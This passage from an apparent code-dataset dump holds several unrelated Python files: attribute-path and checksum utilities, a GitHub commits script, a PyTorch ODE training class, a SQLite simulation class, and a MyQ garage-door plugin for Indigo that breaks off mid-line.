return value\n return default\n\n try:\n value = getattr(obj, field)\n except AttributeError:\n try:\n value = obj[field]\n except TypeError:\n if field.isdigit():\n try:\n value = obj[int(field)]\n except (KeyError, IndexError):\n return default\n else:\n return default\n except KeyError:\n return default\n except KeyError:\n return default\n\n if len(next_field):\n return get_attr_by_path(value, next_field, default)\n\n if value is None:\n return default\n return value\n\n\ndef del_attr_by_path(obj, field):\n try:\n field, next_field = field.split('.', 1)\n except ValueError:\n next_field = ''\n\n if field == '*':\n if isinstance(obj, (list, ListModel, set)):\n for item in obj:\n del_attr_by_path(item, next_field)\n return\n if isinstance(obj, dict):\n for index in obj:\n del_attr_by_path(obj, \"%s.%s\" % (index, next_field))\n return\n\n if len(next_field):\n try:\n return del_attr_by_path(getattr(obj, field), next_field)\n except AttributeError:\n try:\n return del_attr_by_path(obj[field], next_field)\n except (KeyError, TypeError):\n return None\n else:\n try:\n delattr(obj, field)\n except 
AttributeError:\n try:\n del obj[field]\n except (KeyError, TypeError):\n pass\n\n return\n\n# def set_attr_by_path(obj, field, value):\n# try:\n# field, next_field = field.split('.', 1)\n# except ValueError:\n# next_field = ''\n#\n# if field == '*':\n# if isinstance(obj, (list, set)):\n# for item in obj:\n# set_attr_by_path(item, next_field, value)\n# return\n# if isinstance(obj, dict):\n# for index in obj:\n# set_attr_by_path(obj[index], next_field, value)\n# return\n# else:\n# if len(next_field):\n# try:\n# return set_attr_by_path(getattr(obj, field), next_field, value)\n# except AttributeError:\n# try:\n# return set_attr_by_path(obj[field], next_field, value)\n# except KeyError:\n# try:\n# return set_attr_by_path(obj[int(field)], next_field, value)\n# except (KeyError, ValueError):\n\n\ndef xml_to_dict(xml_elem, init_data=None, remove_ns=False):\n\n def clean_tag(tag):\n if isinstance(tag, QName):\n tag = tag.text\n if remove_ns and tag.startswith('{'):\n tag = tag[tag.index('}') + 1:]\n return tag\n\n def get_tag_value(tag):\n children = list(tag)\n if len(children):\n data = {}\n for child in children:\n data = xml_to_dict(child, data, remove_ns)\n return data\n return tag.text\n\n data = init_data or {}\n if isinstance(xml_elem, ElementTree):\n xml_elem = xml_elem.getroot()\n\n tag_name = clean_tag(xml_elem.tag)\n if tag_name not in data:\n data[tag_name] = get_tag_value(xml_elem)\n else:\n if not isinstance(data[tag_name], list):\n init_data[tag_name] = [data[tag_name], ]\n data[tag_name].append(get_tag_value(xml_elem))\n\n return data\n\n\ndef call_silently(func):\n @wraps(func)\n def inner(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except Exception as ex:\n logger.debug(ex)\n\n return inner\n\n\n@contextmanager\ndef subrequest_context():\n global request\n data = request.get_custom_info()\n\n with current_app.test_request_context():\n request.set_custom_info(data)\n yield\n\n\nclass StreamNotifyRequest:\n\n def __init__(self, stream, notify_func=None):\n self._stream = stream\n self._notify_func = notify_func\n\n def notify(self, data):\n if self._notify_func:\n self._notify_func(data)\n\n def read(self, bytes):\n rv = self._stream.read(bytes)\n self.notify(rv)\n return rv\n\n def readline(self, size_hint):\n rv = self._stream.readline(size_hint)\n self.notify(rv)\n return rv\n\n\nclass Checksum():\n\n MD2 = 'MD2'\n MD5 = 'MD5'\n SHA_1 = 'SHA-1'\n SHA_256 = 'SHA-256'\n SHA_384 = 'SHA-384'\n SHA_512 = 'SHA-512'\n\n @classmethod\n def calculate(cls, type, value, encode=True):\n if encode:\n value = str.encode(value)\n if type == cls.MD5:\n return hashlib.md5(value).hexdigest()\n elif type == cls.SHA_1:\n return hashlib.sha1(value).hexdigest()\n elif type == cls.SHA_256:\n return hashlib.sha256(value).hexdigest()\n elif type == cls.SHA_384:\n return hashlib.sha384(value).hexdigest()\n elif type == cls.SHA_512:\n return hashlib.sha512(value).hexdigest()\n else:\n raise NotSupported('{0} encrypt method not supported'.format(type))\n","sub_path":"mc-pybe-release-smip-R4/mc_be/commons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"46658628","text":"#!/usr/bin/python3\n\"\"\" github api challenge \"\"\"\nimport sys\nimport requests\n\nif __name__ == \"__main__\":\n r = requests.get('https://api.github.com/repos/{}/{}/commits'.\n format(sys.argv[2], sys.argv[1]))\n d = r.json()\n if len(d) > 10:\n it = 10\n else:\n it = len(d)\n for i in 
range(it):\n print(d[i].get('sha') + ': ' +\n d[i].get('commit').get('author').get('name'))\n","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"72194640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on March 2021\n@author: Timothy Praditia\n\nThis script contains the Training class that constructs the training object\nfor the model and defines all functions required for training\n\"\"\"\n\nimport torch\nfrom torchdiffeq import odeint\nimport numpy as np\nimport time\nfrom threading import Thread\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as plt\n\nclass Training:\n \n def __init__(self, model, params):\n \"\"\"\n Constructor\n \n Inputs:\n model : the model object constructed using the Net_Model class\n params : the configuration object containing the model settings\n \n \"\"\"\n\n self.params = params\n \n # Send model to the corresponding device (important when using GPU)\n self.model = model.to(self.params.device)\n \n # Choose between ADAM or LBFGS as the optimizer\n # LBFGS theoretically should work better compared to ADAM, but the\n # memory requirement and computation time is also higher\n \n if self.params.lbfgs_optim:\n self.optimizer = torch.optim.LBFGS(model.parameters(), lr = self.params.learning_rate)\n else:\n self.optimizer = torch.optim.Adam(model.parameters(), lr = self.params.learning_rate)\n \n # Initialize the initial epoch value, an empty list to store the training\n # loss values, and set initial best loss value as infinity, to be updated\n # after each iteration\n self.start_epoch = 0\n self.train_loss = []\n self.best_loss = np.infty\n \n # Define the filename to save and/or load the model\n self.model_save_file = self.params.model_path + \"\\\\\" + self.params.model_name + \".pt\"\n \n # Create a Tensorboard summary writer instance in the log directory\n # The Tensorboard summary includes the training and validation loss,\n # as well as hyperparameters values to be compared with other models\n self.tb = SummaryWriter(self.params.log_path)\n \n \n # Load the model if this instance is a training continuation from a\n # previous checkpoint\n if self.params.continue_training:\n print('Restoring model (that is the network\\'s weights) from file...')\n print()\n \n # Load the latest checkpoint\n self.checkpoint = torch.load(self.model_save_file)\n \n # Load the model state_dict (all the network parameters) and send\n # the model to the corresponding device\n self.model.load_state_dict(self.checkpoint['state_dict'])\n self.model.to(self.params.device)\n \n # Load the optimizer state dict (important because ADAM and LBFGS \n # requires past states, e.g. 
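            # Hedged sketch of the save/restore round-trip relied on here
            # (toy model; 'ckpt.pt' is a hypothetical filename). Both state
            # dicts are needed to resume Adam/LBFGS, since they carry
            # per-parameter running statistics:
            #
            #   import torch
            #   net = torch.nn.Linear(2, 1)
            #   opt = torch.optim.Adam(net.parameters(), lr=1e-3)
            #   torch.save({'state_dict': net.state_dict(),
            #               'optimizer': opt.state_dict()}, 'ckpt.pt')
            #   ckpt = torch.load('ckpt.pt')
            #   net.load_state_dict(ckpt['state_dict'])
            #   opt.load_state_dict(ckpt['optimizer'])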
momentum information and approximate\n # Hessian)\n self.optimizer.load_state_dict(self.checkpoint['optimizer'])\n for state in self.optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.to(self.params.device)\n \n # Load the epoch and loss values from the previous training up until\n # the checkpoint to enable complete history of the training\n self.start_epoch = self.checkpoint['epoch']\n self.train_loss = self.checkpoint['loss_train']\n \n # Store the loss values in the Tensorboard log file\n for epoch in range(self.start_epoch):\n self.tb.add_scalar('training_loss', self.train_loss[epoch], epoch)\n \n \n def model_train(self, u0, t, data):\n \"\"\"\n This function trains the model\n \n Inputs:\n u0 : initial condition, dim: [num_features, Nx, Ny]\n t : time (a torch.tensor array containing all values of time steps\n in which the output of the model will be calculated and\n recorded)\n data : training data (breakthrough curve data, 1-D array)\n \n \"\"\"\n \n # Set the number of threads for this program to one\n torch.set_num_threads(1)\n \n # Define the closure function that consists of resetting the\n # gradient buffer, loss function calculation, and backpropagation\n # The closure function is necessary for LBFGS optimizer, because\n # it requires multiple function evaluations\n # The closure function returns the loss value\n def closure():\n \n # Set the model to training mode\n self.model.train()\n \n # Reset the gradient buffer (set to 0)\n self.optimizer.zero_grad()\n \n # Calculate the model prediction (full field solution)\n ode_pred = odeint(self.model, u0.to(self.params.device),\n t.to(self.params.device), rtol=1e-5, atol=1e-6)\n \n # Extract the breakthrough curve from the full field solution prediction\n cauchy_mult = self.model.flux_modules[0].cauchy_mult * self.model.flux_modules[0].D_eff\n pred = ((ode_pred[:,0,-2] - ode_pred[:,0,-1]) * cauchy_mult).squeeze()\n \n # Calculate the loss function using the sum squared error metric\n loss = self.params.error_mult * torch.sum((data.to(self.params.device)\n - pred)**2)\n \n # Extract the predicted retardation factor function for physical\n # regularization\n u = torch.linspace(0.0, 2.0, 100).view(-1,1).to(self.params.device)\n ret_temp = self.model.flux_modules[0].coeff_nn(u)\n \n # Physical regularization: value of the retardation factor should\n # decrease with increasing concentration\n loss += self.params.phys_mult * torch.sum(\n torch.relu(ret_temp[:-1] - ret_temp[1:]))\n \n # Backpropagate to obtain gradient of model parameters\n loss.backward()\n \n return loss\n \n # Plot the predicted retardation factor as a function of dissolved\n # concentration and update at each training epoch\n fig, ax = plt.subplots()\n u = torch.linspace(0.01, 2.00, 100).view(-1,1).to(self.params.device)\n ret_pred = 1 / self.model.flux_modules[0].coeff_nn(u) / 10**self.model.flux_modules[0].p_exp\n ax_pred, = ax.plot(u.cpu(), ret_pred.cpu().detach())\n plt.title('Predicted Retardation Factor',fontsize=16)\n plt.xlabel(r'$c_{diss}$ [mg/L]',fontsize=16)\n plt.ylabel(r'$R$',fontsize=16)\n plt.tight_layout()\n \n # Iterate until maximum epoch number is reached\n for epoch in range(self.start_epoch, self.params.epochs):\n \n # Start timer\n a = time.time()\n \n # Update the model parameters and record the loss value\n self.optimizer.step(closure)\n loss = closure()\n self.train_loss.append(loss.item())\n \n # If the training loss is lower than the best loss value,\n # update the best loss and save 
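            # Hedged sketch of the best-loss checkpointing pattern applied in
            # this training loop (pure-Python toy, no file I/O):
            #
            #   best = float('inf')
            #   saved = []
            #   for epoch_loss in [0.9, 0.7, 0.8, 0.5]:
            #       if epoch_loss < best:
            #           best = epoch_loss
            #           saved.append(epoch_loss)  # stands in for torch.save()
            #   assert saved == [0.9, 0.7, 0.5]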
the model\n if self.train_loss[-1] < self.best_loss:\n self.best_loss = self.train_loss[-1]\n if self.params.save_model:\n thread = Thread(target=self.save_model_to_file(\n epoch))\n thread.start()\n \n # Write the loss values to the tensorboard log file\n self.tb.add_scalar('training_loss', self.train_loss[-1], epoch)\n \n # Stop the timer\n b = time.time()\n \n # Print out the epoch status\n print('Training: Epoch [%d/%d], Training Loss: %.4f, Runtime: %.4f secs'\n %(epoch + 1, self.params.epochs, self.train_loss[-1], b - a))\n \n # Update the retardation factor plot\n ret_pred = 1 / self.model.flux_modules[0].coeff_nn(u) / 10**self.model.flux_modules[0].p_exp\n ax_pred.set_ydata(ret_pred.cpu().detach())\n ax.relim()\n ax.autoscale_view()\n plt.draw()\n plt.pause(0.0001)\n \n # Load model from the latest saved checkpoint (i.e. with the lowest\n # training error)\n if self.params.save_model:\n self.checkpoint = torch.load(self.model_save_file)\n self.model.load_state_dict(self.checkpoint['state_dict'])\n self.model.to(self.params.device)\n \n # Plot the retardation factor and save if required\n ret_pred = 1 / self.model.flux_modules[0].coeff_nn(u) / 10**self.model.flux_modules[0].p_exp\n ax_pred.set_ydata(ret_pred.cpu().detach())\n ax.relim()\n ax.autoscale_view()\n plt.draw()\n plt.pause(0.0001)\n if self.params.save_model:\n plt.savefig(self.params.model_path + \"\\\\\" + self.params.model_name + \"_retardation.png\")\n \n \n def save_model_to_file(self, epoch):\n \"\"\"\n This function writes the model weights along with the network configuration\n and current performance to file\n \n Input:\n epoch : the current epoch number during training\n \n \"\"\"\n \n # Save model weights, optimizer state_dict, and epoch status to file\n state = {'epoch': epoch + 1, 'state_dict': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(), 'loss_train': self.train_loss}\n torch.save(state, self.model_save_file)\n \n # Write the training performance and the configuration of the model to \n # a file\n with open('exp00_config.py', 'r') as f:\n cfg_file = f.read()\n \n output_string = cfg_file + \"\\n\\n# Training Performance\\n\\n\"\n \n output_string += \"CURRENT_EPOCH = \" + str(epoch+1) + \"\\n\"\n output_string += \"EPOCHS = \" + str(self.params.epochs) + \"\\n\"\n output_string += \"CURRENT_TRAINING_ERROR = \" + \\\n str(self.train_loss[-1]) + \"\\n\"\n output_string += \"LOWEST_TRAINING_ERROR = \" + \\\n str(min(self.train_loss))\n \n # Save the configuration and current performance to file\n with open(self.params.model_path + '\\\\' + self.params.model_name +'_cfg_and_performance.txt', 'w') as _text_file:\n _text_file.write(output_string)","sub_path":"python/diffusion_sorption/experimental_data/exp04_training.py","file_name":"exp04_training.py","file_ext":"py","file_size_in_byte":10682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"14619050","text":"import sqlite3 as sql\nimport os\nfrom models.action import Action\nfrom models.condition import Condition\nfrom models.neuron import Neuron\n\n\nclass Brain:\n\n def __init__(self, actions, data):\n self.actions = [Action(name, event) for name, event in actions.items()]\n self.db_path = os.path.join(data['directory'], data['dbname'])\n self.table_name = data['tablename']\n\n self.neurons = [Neuron(action, Condition(self.db_path, self.table_name)) for action in self.actions]\n\n def result_generator(self, cursor, arraysize=100):\n \"\"\"\n An iterator that uses fetchmany to keep 
memory usage down\n \"\"\"\n while True:\n results = cursor.fetchmany(arraysize)\n if not results:\n break\n for result in results:\n yield result\n\n def run_simulation(self):\n \"\"\"\n Iterate over the dataset row by row and invoke all action events (fire the neuron) if a condition is met\n \"\"\"\n con = sql.connect(self.db_path)\n con.row_factory = sql.Row\n cursor = con.cursor()\n cursor.execute('select * from {}'.format(self.table_name))\n\n for row in self.result_generator(cursor):\n for neuron in self.neurons:\n neuron.signal(row)\n","sub_path":"models/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357498690","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n####################\n## Python to interface with MyQ garage doors.\n## based on https://github.com/Einstein42/myq-garage\n\nimport sys\nimport time\nimport requests\nimport logging\n\nfrom requests.auth import HTTPBasicAuth\nfrom requests.utils import quote\n\nfrom ghpu import GitHubPluginUpdater\n\nkCurDevVersCount = 1 # current version of plugin devices\n\nkDoorClose = '0'\nkDoorOpen = '1'\n\ndoorStateNames = [\"Unknown\", \"Open\", \"Closed\", \"Stopped\", \"Opening\", \"Closing\", \"Unknown\", \"Disconnected\", \"Unknown\", \"Unknown\"]\n\nuserAgent = \"Chamberlain/3773 (iPhone; iOS 10.0.1; Scale/2.00)\"\n\n################################################################################\nclass Plugin(indigo.PluginBase):\n\n ########################################\n # Main Plugin methods\n ########################################\n def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):\n indigo.PluginBase.__init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs)\n\n pfmt = logging.Formatter('%(asctime)s.%(msecs)03d\\t[%(levelname)8s] %(name)20s.%(funcName)-25s%(msg)s', datefmt='%Y-%m-%d %H:%M:%S')\n self.plugin_file_handler.setFormatter(pfmt)\n\n try:\n self.logLevel = int(self.pluginPrefs[u\"logLevel\"])\n except:\n self.logLevel = logging.INFO\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(u\"logLevel = \" + str(self.logLevel))\n \n self.loginOK = False\n\n\n def startup(self):\n indigo.server.log(u\"Starting MyQ\")\n\n self.myqDevices = {}\n self.triggers = { }\n\n self.apiData = {\n \"chamberlain\" : { \"service\" : \"https://myqexternal.myqdevice.com\",\n \"appID\" : \"Vj8pQggXLhLy0WHahglCD4N1nAkkXQtGYpq2HrHD7H1nvmbT55KqtN6RSF4ILB/i\"\n },\n \"craftsman\" : { \"service\" : \"https://craftexternal.myqdevice.com\",\n \"appID\" : \"eU97d99kMG4t3STJZO/Mu2wt69yTQwM0WXZA5oZ74/ascQ2xQrLD/yjeVhEQccBZ\"\n },\n \"liftmaster\" : { \"service\" : \"https://myqexternal.myqdevice.com\",\n \"appID\" : \"Vj8pQggXLhLy0WHahglCD4N1nAkkXQtGYpq2HrHD7H1nvmbT55KqtN6RSF4ILB/i\"\n },\n }\n\n self.updater = GitHubPluginUpdater(self)\n self.updateFrequency = float(self.pluginPrefs.get('updateFrequency', \"24\")) * 60.0 * 60.0\n self.logger.debug(u\"updateFrequency = \" + str(self.updateFrequency))\n self.next_update_check = time.time()\n\n self.statusFrequency = float(self.pluginPrefs.get('statusFrequency', \"10\")) * 60.0\n self.logger.debug(u\"statusFrequency = \" + str(self.statusFrequency))\n self.next_status_check = time.time()\n\n # Watch for changes to sensors associated with an opener\n indigo.devices.subscribeToChanges()\n\n\n def shutdown(self):\n indigo.server.log(u\"Shutting down MyQ\")\n\n\n def runConcurrentThread(self):\n\n try:\n 
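        # Hedged sketch of the timestamp-based polling idiom this loop uses
        # (the 600-second interval is illustrative; the real values come
        # from the statusFrequency/updateFrequency prefs):
        #
        #   import time
        #   interval = 600.0
        #   next_check = time.time()
        #   while True:
        #       if time.time() > next_check:
        #           # ...do the periodic work...
        #           next_check = time.time() + interval
        #       time.sleep(60.0)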
while True:\n\n if self.updateFrequency > 0:\n if time.time() > self.next_update_check:\n self.updater.checkForUpdate()\n self.next_update_check = time.time() + self.updateFrequency\n\n if time.time() > self.next_status_check:\n self.getDevices()\n self.next_status_check = time.time() + self.statusFrequency\n\n self.sleep(60.0)\n\n except self.stopThread:\n pass\n\n def deviceStartComm(self, device):\n\n instanceVers = int(device.pluginProps.get('devVersCount', 0))\n if instanceVers >= kCurDevVersCount:\n self.logger.debug(u\"deviceStartComm: \" + device.name + u\": Device Version is up to date\")\n elif instanceVers < kCurDevVersCount:\n newProps = device.pluginProps\n newProps['IsLockSubType'] = True\n newProps[\"devVersCount\"] = kCurDevVersCount\n device.replacePluginPropsOnServer(newProps)\n device.stateListOrDisplayStateIdChanged()\n self.logger.debug(u\"deviceStartComm: Updated \" + device.name + \" to version \" + str(kCurDevVersCount))\n else:\n self.logger.error(u\"deviceStartComm: Unknown device version: \" + str(instanceVers) + \" for device \" + device.name)\n\n self.logger.debug(\"deviceStartComm: Adding Device %s (%d) to MyQ device list\" % (device.name, device.id))\n assert device.id not in self.myqDevices\n self.myqDevices[device.id] = device\n\n def deviceStopComm(self, device):\n self.logger.debug(\"deviceStopComm: Removing Device %s (%d) from MyQ device list\" % (device.name, device.id))\n assert device.id in self.myqDevices\n del self.myqDevices[device.id]\n\n\n def triggerStartProcessing(self, trigger):\n self.logger.debug(\"Adding Trigger %s (%d) - %s\" % (trigger.name, trigger.id, trigger.pluginTypeId))\n assert trigger.id not in self.triggers\n self.triggers[trigger.id] = trigger\n\n def triggerStopProcessing(self, trigger):\n self.logger.debug(\"Removing Trigger %s (%d)\" % (trigger.name, trigger.id))\n assert trigger.id in self.triggers\n del self.triggers[trigger.id]\n\n def triggerCheck(self, device):\n try:\n sensor = indigo.devices[int(device.pluginProps[\"sensor\"])]\n except:\n self.logger.debug(\"Skipping triggers, no linked sensor for MyQ device %s\" % (device.name))\n return\n\n for triggerId, trigger in sorted(self.triggers.iteritems()):\n self.logger.debug(\"Checking Trigger %s (%s), Type: %s\" % (trigger.name, trigger.id, trigger.pluginTypeId))\n if isinstance(sensor, indigo.SensorDevice):\n sensor_state = sensor.onState\n elif isinstance(sensor, indigo.MultiIODevice):\n sensor_state = not sensor.states[\"binaryInput1\"] # I/O devices are opposite from sensors in terms of the state binary\n \n self.logger.debug(\"\\tmyqDoorSync: %s is %s, linked sensor %s is %s\" % (device.name, str(device.onState), sensor.name, str(sensor_state)))\n\n if device.onState == sensor_state: # these values are supposed to be opposite due to difference between sensor and lock devices\n indigo.trigger.execute(trigger) # so execute the out of sync trigger when they're not opposite\n\n\n ########################################\n # Menu Methods\n ########################################\n\n def checkForUpdates(self):\n self.updater.checkForUpdate()\n\n def updatePlugin(self):\n self.updater.update()\n\n def forceUpdate(self):\n self.updater.update(currentVersion='0.0.0')\n\n ########################################\n # ConfigUI methods\n ########################################\n\n def validatePrefsConfigUi(self, valuesDict):\n self.logger.debug(u\"validatePrefsConfigUi called\")\n errorDict = indigo.Dict()\n\n try:\n self.logLevel = int(valuesDict[u\"logLevel\"])\n except:\n 
self.logLevel = logging.INFO\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(u\"logLevel = \" + str(self.logLevel))\n\n if len(valuesDict['myqLogin']) < 5:\n errorDict['myqLogin'] = u\"Enter your MyQ login name (email address)\"\n\n if len(valuesDict['myqPassword']) < 1:\n errorDict['myqPassword'] = u\"Enter your MyQ login password\"\n\n statusFrequency = int(valuesDict['statusFrequency'])\n if (statusFrequency < 5) or (statusFrequency > (24 * 60)):\n errorDict['statusFrequency'] = u\"Status frequency must be at least 5 min and no more than 24 hours\"\n\n updateFrequency = int(valuesDict['updateFrequency'])\n if (updateFrequency < 0) or (updateFrequency > 24):\n errorDict['updateFrequency'] = u\"Update frequency is invalid - enter a valid number (between 0 and 24 hours)\"\n\n if len(errorDict) > 0:\n return (False, valuesDict, errorDict)\n\n if not self.myqLogin(username=valuesDict['myqLogin'], password=valuesDict['myqPassword'], brand=valuesDict['openerBrand']):\n errorDict['myqLogin'] = u\"Login to MyQ server failed, check login, password, and brand\"\n errorDict['myqPassword'] = u\"Login to MyQ server failed, check login, password, and brand\"\n return (False, valuesDict, errorDict)\n\n return (True, valuesDict)\n\n\n def closedPrefsConfigUi(self, valuesDict, userCancelled):\n if not userCancelled:\n try:\n self.logLevel = int(valuesDict[u\"logLevel\"])\n except:\n self.logLevel = logging.INFO\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(u\"logLevel = \" + str(self.logLevel))\n\n self.updateFrequency = float(self.pluginPrefs.get('updateFrequency', \"24\")) * 60.0 * 60.0\n self.logger.debug(u\"updateFrequency = \" + str(self.updateFrequency))\n self.next_update_check = time.time()\n\n self.statusFrequency = float(self.pluginPrefs.get('statusFrequency', \"10\")) * 60.0\n self.logger.debug(u\"statusFrequency = \" + str(self.statusFrequency))\n self.next_status_check = time.time() + self.statusFrequency\n\n self.getDevices()\n\n ################################################################################\n #\n # delegate methods for indigo.devices.subscribeToChanges()\n #\n ################################################################################\n\n def deviceDeleted(self, dev):\n indigo.PluginBase.deviceDeleted(self, dev)\n self.logger.debug(u\"deviceDeleted: %s \" % dev.name)\n\n for myqDeviceId, myqDevice in sorted(self.myqDevices.iteritems()):\n try:\n sensorDev = myqDevice.pluginProps[\"sensor\"]\n except:\n pass\n else:\n if dev.id == int(sensorDev):\n self.logger.info(u\"A device (%s) that was associated with a MyQ device has been deleted.\" % dev.name)\n newProps = myqDevice.pluginProps\n newProps[\"sensor\"] = \"\"\n myqDevice.replacePluginPropsOnServer(newProps)\n\n\n def deviceUpdated(self, origDev, newDev):\n indigo.PluginBase.deviceUpdated(self, origDev, newDev)\n# self.logger.debug(u\"deviceUpdated: %s \" % newDev.name)\n\n for myqDeviceId, myqDevice in sorted(self.myqDevices.iteritems()):\n# self.logger.debug(u\"\\tchecking MyQ Device: %s \" % myqDevice.name)\n try:\n sensorDev = int(myqDevice.pluginProps[\"sensor\"])\n except:\n pass\n else:\n if origDev.id == sensorDev:\n if isinstance(newDev, indigo.SensorDevice):\n old_sensor_state = origDev.onState\n sensor_state = newDev.onState\n elif isinstance(newDev, indigo.MultiIODevice):\n old_sensor_state = not origDev.states[\"binaryInput1\"] # I/O devices are opposite from sensors in terms of the state binary\n sensor_state = not newDev.states[\"binaryInput1\"] # I/O 
devices are opposite from sensors in terms of the state binary\n if old_sensor_state == sensor_state:\n self.logger.debug(u\"deviceUpdated: %s has not changed\" % origDev.name)\n return\n\n self.logger.debug(u\"deviceUpdated: %s has changed state: %s\" % (origDev.name, str(sensor_state)))\n if sensor_state:\n myqDevice.updateStateOnServer(key=\"onOffState\", value=False) # sensor \"On\" means the door's open, which is False for lock type devices (unlocked)\n else:\n myqDevice.updateStateOnServer(key=\"onOffState\", value=True) # sensor \"Off\" means the door's closed, which is True for lock type devices (locked)\n self.triggerCheck(myqDevice)\n\n ########################################\n\n def actionControlDevice(self, action, dev):\n\n if action.deviceAction == indigo.kDeviceAction.Unlock:\n self.logger.debug(u\"actionControlDevice: \\\"%s\\\" Unlock\" % dev.name)\n self.changeDevice(dev, kDoorOpen)\n\n elif action.deviceAction == indigo.kDeviceAction.Lock:\n self.logger.debug(u\"actionControlDevice: \\\"%s\\\" Lock\" % dev.name)\n self.changeDevice(dev, kDoorClose)\n\n elif action.deviceAction == indigo.kDeviceAction.RequestStatus:\n self.logger.debug(u\"actionControlDevice: \\\"%s\\\" Request Status\" % dev.name)\n self.getDevices()\n\n else:\n self.logger.error(u\"actionControlDevice: \\\"%s\\\" Unsupported action requested: %s\" % (dev.name, str(action)))\n\n\n ########################################\n\n\n def myqLogin(self, username=None, password=None, brand=None):\n\n if username == None or password == None or brand == None:\n self.logger.debug(u\"myqLogin failure, Username or Password not set\")\n return False\n\n url = self.apiData[brand][\"service\"] + '/api/v4/user/validate'\n# self.logger.debug(u\"myqLogin url = %s\" % str(url))\n\n headers = {\n 'User-Agent': userAgent, \n \"BrandId\": \"2\",\n \"ApiVersion\": \"4.1\",\n \"Culture\": \"en\",\n 'MyQApplicationId': self.apiData[brand][\"appID\"]\n }\n# self.logger.debug(u\"myqLogin headers = %s\" % str(headers))\n\n payload = {\n 'username': username, \n 'password': password\n }\n# self.logger.debug(u\"myqLogin payload = %s\" % str(payload))\n\n try:\n response = requests.post(url, json=payload, headers=headers)\n# self.logger.debug(u\"myqLogin response = %s\" % (str(response.text)))\n except requests.exceptions.RequestException as err:\n self.logger.debug(u\"myqLogin failure, request url = %s\" % (url))\n self.logger.error(u\"myqLogin failure, RequestException: %s\" % (str(err)))\n self.securityToken = \"\"\n return False\n\n if (response.status_code != requests.codes.ok):\n self.logger.debug(u\"myqLogin failure, Enum err code %s\" % (response.status_coderl))\n self.securityToken = \"\"\n return False \n\n try:\n data = response.json()\n except:\n self.logger.error(u\"myqLogin failure, JSON Decode Error\")\n self.securityToken = \"\"\n return False\n\n if data['ReturnCode'] != '0':\n self.logger.error(u\"myqLogin failure, Bad return code: %s\" % (data['ErrorMessage']))\n self.securityToken = \"\"\n return False\n\n self.securityToken = data['SecurityToken']\n self.logger.debug(u\"myqLogin successfull\")\n self.loginOK = True\n return True\n\n ########################################\n\n def getDevices(self):\n\n brand = self.pluginPrefs.get('openerBrand', None)\n \n if not self.myqLogin(username = self.pluginPrefs.get('myqLogin', None), password = self.pluginPrefs.get('myqPassword', None), brand=brand):\n self.logger.debug(u\"getDevices: MyQ Login Failure\")\n return\n\n url = self.apiData[brand][\"service\"] + 
'/api/v4/UserDeviceDetails/Get'\n params = {'appId':self.apiData[brand][\"appID\"], 'securityToken':self.securityToken}\n headers = {'User-Agent': userAgent }\n try:\n response = requests.get(url, params=params, headers=headers)\n except requests.exceptions.RequestException as err:\n self.logger.error(u\"getDevices: RequestException: \" + str(err))\n return\n\n data = response.json()\n if data['ReturnCode'] != '0':\n self.logger.error(u\"getDevices: Bad return code: \" + data['ErrorMessage'])\n return\n\n self.logger.debug(u\"getDevices: %d Devices\" % len(data['Devices']))\n\n for myqDevice in data['Devices']:\n self.logger.debug(u\"getDevices: MyQDeviceTypeId = %s, MyQDeviceTypeName = %s, DeviceId = %s\" % (myqDevice['MyQDeviceTypeId'], myqDevice['MyQDeviceTypeName'], myqDevice['MyQDeviceId']))\n\n # 2 = garage door, 5 = gate, 7 = MyQGarage(no gateway), 17 = Garage Door Opener WGDO\n\n if myqDevice['MyQDeviceTypeId'] == 1: # Gateway\n pass\n\n elif (myqDevice['MyQDeviceTypeId'] == 2) or (myqDevice['MyQDeviceTypeId'] == 5) or (myqDevice['MyQDeviceTypeId'] == 7) or (myqDevice['MyQDeviceTypeId'] == 17):\n\n myqID = myqDevice['MyQDeviceId']\n state = -1\n\n for attr in myqDevice['Attributes']:\n\n if attr[u'AttributeDisplayName'] == u'desc':\n descAttr = attr[u'Value']\n elif attr[u'AttributeDisplayName'] == u'name':\n nameAttr = attr[u'Value']\n elif attr[u'AttributeDisplayName'] == u'doorstate':\n state = int(attr[u'Value'])\n\n name = \"%s (%s)\" % (descAttr, nameAttr)\n\n if state > (len(doorStateNames) - 1):\n self.logger.error(u\"getDevices: Opener %s (%s), state out of range: %i\" % (name, myqDevice['MyQDeviceId'], state))\n state = 0 # unknown high states\n elif state == -1:\n self.logger.error(u\"getDevices: Opener %s (%s), state unknown\" % (name, myqDevice['MyQDeviceId']))\n state = 0 # unknown state\n\n found = False\n iterator = indigo.devices.iter(filter=\"self\")\n for dev in iterator:\n self.logger.debug(u'Checking Opener Device: %s (%s) against %s' % (dev.name, dev.address, myqID))\n if int(dev.address) == int(myqID):\n found = True\n newState = doorStateNames[state]\n if dev.states[\"doorStatus\"] != newState:\n self.logger.info(u\"%s %s is now %s (%d)\" % (myqDevice['MyQDeviceTypeName'], name, newState, state))\n dev.updateStateOnServer(key=\"doorStatus\", value=newState)\n if state == 2:\n dev.updateStateOnServer(key=\"onOffState\", value=True) # closed is True\n else:\n dev.updateStateOnServer(key=\"onOffState\", value=False) # anything other than closed is \"unlocked\"\n self.triggerCheck(dev)\n break\n \n if not found:\n self.logger.debug(u'Unknown MyQ Device: %s' % (myqID))\n\n # New MyQ device found, create it and set current state\n\n try:\n newdev = 